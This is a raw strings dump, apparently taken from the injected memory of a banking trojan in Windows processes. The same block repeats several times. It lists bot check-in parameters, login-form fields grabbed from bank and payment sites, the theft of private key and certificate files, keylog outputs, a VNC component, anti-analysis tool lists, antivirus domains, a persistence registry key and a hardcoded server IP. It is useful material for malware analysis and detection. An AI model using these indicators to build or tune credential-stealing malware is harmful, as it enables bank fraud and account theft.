Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

SYSTEM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Windows\system32\config\systemprofile\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_864_rwx_01AE0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_864_rwx_026F0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

SYSTEM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\rkousid.exe

C:\Windows\system32\config\systemprofile\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

taskhost.exe_872_rwx_00580000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

taskhost.exe_872_rwx_00640000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

